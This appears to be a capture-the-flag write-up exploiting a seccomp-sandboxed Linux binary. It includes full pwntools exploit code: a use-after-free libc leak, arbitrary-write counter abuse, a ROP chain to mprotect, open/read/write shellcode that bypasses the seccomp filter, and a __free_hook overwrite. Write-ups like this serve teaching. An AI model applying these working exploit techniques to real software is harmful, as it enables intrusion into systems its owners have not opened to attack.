Preparations
I don’t give any special preferences to IDA or Ghidra and use both disassemblers depending on the situation. However, in PWN challenges, IDA normally generates better pseudocode.
Vanilla GDB is normally used in combinations with various plugins: PEDA, GEF, or pwndbg. Out of them, PEDA is the oldest (and classical!) variant, and I still use it.
While programmers all over the world are migrating en masse to Python 3, developers of exploits remain loyal to oldie-goodie Python 2. The point is that the third version of Python handles raw bytes in quite an inconvenient way, and you have to keep this in mind all the time and spend extra effort on bug fixing.
Other useful tools are:
- pwntools – a handy Python API for interaction with executable files;
- checksec – a bash script used to check security mechanisms of binary files; and
- patchelf – a utility for patching libc and executable files.
Initial examination
So, the author gives me a binary and two more files: a server libc and a linker. The path to the file is precisely specified, and I immediately suspect that a custom-made shellcode will be required at the final stage.
First of all, I execute the binary and try to estimate the difficulty by reviewing security mitigations in checksec
.
To make sure that the executable file uses the right libc, I patch it to adjust the path to the linker and specify the libc in the LD_PRELOAD
environment variable.
patchelf --set-interpreter ld-2.31.so ./crapLD_PRELOAD=./libc-2.31.so ./crap
The simple menu implies that the solution may also be quick and simple, but this hope fades after launching checksec
.
All the protection mechanisms are enabled. Below are their brief descriptions:
NX makes the stack non-executable. Twenty years ago, the majority of stack overflow vulnerabilities were exploited through the injection of shellcode into the stack and subsequent jump on it. NX makes this trick impossible, even though such exploitation techniques are still used in the IoT world.
Stack canary is a secret value placed on the stack before the RBP register and return pointer. As a result, it becomes impossible to overwrite the register and return pointer, thus, abusing the buffer overflow vulnerability.
Full RELRO makes the GOT segment read-only and places it before the BSS segment. Exploitation techniques involving GOT overwriting are pretty simple, but their detailed analysis goes beyond the scope of this article. More information on the Global Offset Table can be found here.
ASLR and PIE
Address Space Layout Randomization (ASLR) is a protection mechanism making exploitation much more labor-consuming. It randomizes base addresses of all memory regions except for the sections belonging to the binary itself.
In essence, ASLR works as follows. A fixed reference point (base address) is set within a range of addresses that exceeds the randomized memory area by several orders of magnitude. This address must meet two requirements.
- its last two nibbles (i.e. half-bytes) must be equal to 000; and
- the entire randomized region must not conflict with other regions or go beyond the allowed) range of addresses.
Unfortunately for the attacker, this mechanism is very efficient. Let’s say, I need to find the address of the system
function in libc. How much time do I need to find it? The first byte of any library’s address must be (OK, in most cases must be!) 0x7f. The last three nibbles are known because they remain the same every time the program is launched regardless of the base address selection. So, I can perform a simple computation:
2^8 * 2^8 * 2^8 * 2^4 = 2^28 = 268 435 456
Of course, this is a rough estimate that does not take into account some addresses in the upper part of the range that cannot be used (otherwise, the rest of the memory region wouldn’t fit into the range). However, it is sufficient for my purposes. Let’s say, it takes me three seconds to launch an exploit. So, it will take me some 25 years to brute-force the required address, which is way too long taking that CTF contest only lasts for 48 hours.
In simple terms, PIE is an ASLR for memory segments of the executable file. Unlike the basic ASLR operating at the OS level, PIE is an optional protection mechanism that may or may not be present in a binary file.
Reverse engineering
An old legend says that if you awaken a reverse engineer in the middle of the night and give her a laptop, she will immediately run IDA and press F5. As for me, I always do so when I deal with an unknown executable file.
I am lucky: the decompiled pseudocode looks nicely and is easily readable.
Let’s examine the above functions one-by-one.
1. init
There is nothing special there: the input/output buffering is disabled, and operation time is specified for the program (after 0x3c seconds, it jumps to the handler
function consisting of a single line: exit(
).
2. sandbox
This function is more interesting: I see that seccomp is configured pretty rigidly in the program. Let’s see what system calls are allowed. A numbered Linux syscall table is available here.
As you can see, exit
, mprotect
, open
, and close
are permitted. The final exploitation stage is now clear: I must make one of the memory regions readable, writable, and executable, write there a shellcode enabling to read the file containing the flag, and jump to it.
System calls read
and write
are also available, although not to the full extent. IDA does not show seccomp_rule_add
arguments after the fourth one, while the main configuration rules for the above syscalls must be there. But I can right-click on the function name and select the Set
option, which allows to add a few more __int64
and see more arguments.
Based on my personal experience with seccomp
, I can say that IDA has incorrectly identified the seventh argument, which is equal to SCMP_CMP_EQ
(i.e. 4); however, it becomes clear that the program can read only from the null file descriptor (stdin
) and write only to the first descriptor (stdout
). It remains unclear though how to write the shellcode: it must be read from an open file’s descriptor that definitely won’t be null. I will get back to this later.
3. menu
This menu is displayed in main
at each cycle iteration.
4. get_num
The number of the selected function is obtained securely; so, there is nothing of interest to me here.
5. do_read
The author of the task grants me the arbitrary read power. Such sorts of tasks aren’t unique or extremely rare, but they are usually very intriguing. I can read anything from anywhere not more than twice – or, at least, the program will think so. The read_count
variable is not global; therefore, it is stored not in the stack, but in BSS. I must keep this information in mind as it may facilitate the exploitation.
6. do_write
do_write
operates in the same way. I can write anything anywhere provided that write_count
is less than or equal to one. It’s not a big deal to cheat this mechanism: for instance, after each writing operation performed with do_write
, I can set the write_count
value to -1
, thus, gaining the unlimited arbitrary write power (as you understand, the unlimited arbitrary read power can be obtained using the same trick).
I haven’t finished reviewing the code yet but already gained significant control over the program execution flow.
7. leave_feedback
When I select the third menu option, the program asks to leave feedback instead of closing immediately. The following mechanism is used:
- program checks whether the global
feedback
pointer is equal to zero; - if not, the program allocates a chunk 0x501 in size and allows me to directly input information into it;
- then the program asks me whether I want my feedback to be saved; and
- if I enter
n
, the chunk is cleared, but thefeedback
pointer isn’t reset to zero.
So far, this error does not seem critical, but later on, it may become very useful for me.
To call this function, I must enter 4
(as you remember, such an option is not offered in the menu). The view_feedback
function displays the information feedback
points to without checking the status of the chunk (that could be already freed). This vulnerability type is called Use-After-Free (UAF). In theory, the user’s input should be stored at the pointer’s address – but a bit later, I will show that this is not always true for freed memory chunks.
UAF and why it’s great
Detailed information about the ptmalloc implementation can be found in the Sploit Fun blog; so, I will describe the interaction with heap memory only briefly. I am going to write a special program to show what happens when a programmer creates a chunk 1281 bytes in size and then frees it.
#include <stdio.h>#include <stdlib.h>int main() { void **a, *b; a = calloc(1, 1281); b = malloc(200); free(a); printf("%p\n", *a);}
The b chunk is required to prevent consolidation with the top chunk and complete destruction of the structure of the a chunk after freeing it.
-
calloc(
returns the pointer exactly to the position where data can be written; this allows the programmer not to keep in mind internal memory heap implementation mechanisms;1, 1281) - the size of the a chunk exceeds 1032; therefore, after the
free(
command, it is placed into the so-called unsorted bin. Important: the forward pointer and backward pointer (i.e. pointers created to expedite the work of ptmalloc) of the chunk placed into the unsorted bin both point to libc.a) - the a pointer is equal to the address of the forward pointer. Therefore, a pointer to libc is currently stored where the user’s input was earlier stored, and
printf
will display it to me.
Overall, the first exploitation phase is clear.
- I select
leave_feedback
and tell the program not to save my feedback. - Then I select
view_feedback
and get the libc address.
I use GDB to calculate the offset to the libc base address.
- Using
set
, I load the required version of libc.exec-wrapper env 'LD_PRELOAD=./ libc-2. 31. so' -
Using the
vmmap
command, I examine all memory regions. -
Using the
ni
andsi
commands, I reach to the instruction that frees the chunk I am interested in; usingx/
, I check what pointer is stored there.6b
I see 0x7f in the end and conclude that this is one of the libc addresses. It’s not a big deal to calculate the difference between 0x7ffff7fc2be0 and 0x7ffff7c0d000: it is 0x3b5be0. Now I know the offset from the libc base address to the obtained address.
I start writing the exploit:
from pwn import *p=process('./crap')p.recvuntil('>')p.sendline('3')p.recvuntil(': ')p.sendline('AAAA')p.recvuntil('y/n')p.sendline('n')p.recvuntil('>')p.sendline('4')# Parsing the output section I am interested inx = p.recvline().strip().split(': ')[-1][::-1].encode('hex')libc_base = int(x, 16) - 0x3b5be0print 'libc base is', hex(libc_base)
Strengthening the control
To simplify the development of my exploit, I am going to describe the read
and write
functions using my own Python wrappers.
def read(addr): p.sendline('1') p.recvuntil('addr: ') p.sendline(hex(addr)[2:]) x=p.recvline().strip().split(': ')[-1] p.recvuntil('>') return xdef write(where, what): p.sendline('2') p.recvuntil(': ') p.sendline('{} {}'.format(hex(where)[2:], hex(what)[2:])) p.recvuntil('>')
I made a few steps towards the exploitation, but success is still far, far away. I know the libc address, but I also need the PIE and stack addresses. The GNU C Library (glibc) includes a global variable called environ
that points to environment variables stored in the stack; so, I need to find out its value. This can be done as follows:
- Use
environ
to get the stack address; and - Use scientific trial and error to find a position on the stack that stores one of the PIE addresses at each launch of the program.
To calculate the offset from the address stored in environ
to the libc base address, I use again the x
and vmmap
commands.
The following simple code will perform the required operations:
environ=libc_base+0x3b8618print 'environ is', hex(environ)stack=int(read(environ), 16)print 'stack is', hex(stack)# the value is -48; it can be obtained either by examining the stack in GDB# or by brute-forcingpie=read(stack-48)# the offset is -2970; all offsets were obtained using x and vmmappie=int(pie, 16)-2970read_count=pie+2105392write_count=pie+0x202033feedback=pie+0x202038print 'pie is', hex(pie)write(read_count, 0) # read_count=0write(write_count, 0xfffffffffffffff0) # write_count = -16
What is ROP?
Return-oriented programming (ROP) is an elegant technique that can be used to bypass certain protection mechanisms. I strongly recommend mastering it – even if the development of exploits is just a hobby for you. Detailed descriptions of basic ROP tricks are available on ROP Emporium.
In brief, ROP is yet another binary exploitation technique; its key feature is that you assemble your program from fragments of the exploited program. The term “gadget” refers to a special fragment of the program: after its execution, the hacker does not lose control over the program execution flow but can execute other gadgets.
I have to make one of the memory regions Readable, Writable и eXecutable (RWX). To escalate my privileges, I call the mprotect
function as shown below.
mprotect(addr, some_size, 7)
The third argument indicates that I want to make the region RWX.
ROP will help me to place the right values to the right registers. In 64-bit Linux, arguments correspond to registers in the following order:
- RDI – I
- RSI – II
- RDX – III
- RCX – IV
- R8 – V
- R9 – VI
Subsequent arguments (if any) are stored in the stack.
ROP is normally used to exploit the buffer overflow vulnerability; but there is no such vulnerability here, and I can’t create it artificially. Therefore, I invent the following algorithm.
- Using
do_write
, I write a ROP chain in the stack so that the offset from the beginning of this chain to the return address of thedo_write
function is exactly 16 bytes. - After writing the entire chain on the stack, I overwrite
return
by a gadget in the format:address do_write pop
. This gadget will ‘consume’ the 16 bytes left between the return pointer and the ROP chain and execute the chain.some_reg; pop some_reg; ret;
For the testing purposes, I select an address spaced away from the PIE root by 0x201000 and try to escalate my rights to it. The general scheme looks as follows:
make rdi = (pie+0x201000)# figure 1000 was pulled out of a hat. You can use any other number# because mprotect will change the entire region's rightsmake rsi = 1000make rdx = 7call mprotect
I prefer to search for gadgets with ROPgadget.
I feed the obtained libc to the program and search for gadgets using the command below:
ROPgadget --binary libc-2.31.so > n
Using any text processing program, I can now extract suitable gadgets from the long list shown above. In this particular case, I select the following gadgets:
0x0000000000021882 : pop rdi ; ret0x0000000000022192 : pop rsi ; ret0x000000000012c561 : pop rax ; pop rdx ; pop rbx ; ret0x000000000002187f : pop r14 ; pop r15 ; ret
The last gadget will trigger the chain execution. The offset to mprotect
can be found in GDB. Below is the exploit code:
pop_rdi = 0x21882pop_rsi = 0x22192pop_rax_rdx_rbx = 0x12c561pop_r14_r15 = 0x2187fplace=pie+0x201000mprotect = libc_base + 986064# The offset can be calculated by setting a breakpoint# at the ret instruction in the do_write functionadd = stack - 264write(add, libc_base+pop_rdi)write(write_count, 0xfffffffffffffff0)write(add+8, place)write(write_count, 0xfffffffffffffff0)write(add+16, libc_base+pop_rsi)write(write_count, 0xfffffffffffffff0)write(add+24, 1000)write(write_count, 0xfffffffffffffff0)write(add+32, libc_base+pop_rax_rdx_rbx)write(write_count, 0xfffffffffffffff0)write(add+40, 0)write(write_count, 0xfffffffffffffff0)write(add+48, 7)write(write_count, 0xfffffffffffffff0)write(add+56, 0)write(write_count, 0xfffffffffffffff0)write(add+64, mprotect)write(write_count, 0xfffffffffffffff0)# After executing the chain, I jump to mainwrite(add+72, pie+0x0000000000001192)write(write_count, 0xfffffffffffffff0)# This is where I finished writing ROP;# now I have to force the program to execute it# Position in the stack where the return address of do_write is locatedret = stack - 288write(ret, libc_base+pop_r14_r15)write(write_count, 0xfffffffffffffff0)
The target memory region is now readable, writable, and executable.
Writing shellcode
Time to figure out how to write a shellcode required to complete the exploitation. During the CTF challenge, I spent some ten hours on this… Fortunately, at some point I stumbled upon an interesting question on Stack Overflow that gave me the right idea.
The idea is as follows: the minimum possible file descriptor is assigned to a newly-opened file. If the null descriptor were available, then open(
would return zero (i.e. under normal conditions, I could address the file as stdin
). To achieve this, all I have to do is execute close(
because seccomp permits the close
system call.
The idea is simple and elegant, which makes this task truly exciting.
shell=''' mov rdi, 0 mov rax, 3 syscall ; closing stdin mov rsi, 0 push 0 mov rcx, 8392585648256674918 ; "flag.txt" in little-endian push rcx mov rdi, rsp mov rax, 2 syscall mov rax, 0 mov rdi, 0 mov rsi, rsp mov rdx, 60 syscall ; writing flag to the top of the stack mov rdi, 1 mov rsi, rsp mov rdx, 60 mov rax, 1 syscall ; printing flag '''print shell# pwntools provides a handy API for shellcode creationshellcode=asm(shell).encode('hex')# There is nothing special in this cycle. It just creates 8-byte recordsfor i in range(13): print(i) write(place+(i*8), int(shellcode[i*16:(i+1)*16].decode('hex')[::-1].encode('hex'), 16)) write(write_count, 0xfffffffffffffff0)
Using free_hook
GNU C makes it possible to alter the behavior of the functions malloc
, free
, and realloc
using respective hooks. If the __malloc_hook
, __free_hook
, or __realloc_hook
values are nonzero, then the program (that attempts to perform the respective functions) will jump to the addresses written in them. More information on this and other binary exploitation features can be found in the extremely useful CTF-pwn-tips repository.
To complete the exploitation, I am going to jump to the shellcode using __free_hook
. As you remember, the program executes the free
operation if I opt not to save my feedback in the leave_feedback
function. The final part of the exploit is as follows:
free_hook=3898952+libc_baseprint 'free_hook is', hex(free_hook)print 'place is', hex(place)print 'feedback is', hex(feedback)write(free_hook, place)write(write_count, 0xfffffffffffffff0)write(feedback, 0)# Triggering freep.sendline('3')p.recvuntil(': ')p.sendline('AAAA')p.recvuntil('y/n')p.sendline('n')p.interactive()
Conclusions
I am grateful to PewZ, the author of this task, for an exciting idea and for the provision of a docker container from the game server. To solve the task by your own, execute the command:
nc ctf.sprush.rocks 6001
It should remain active at least until mid-June 2020.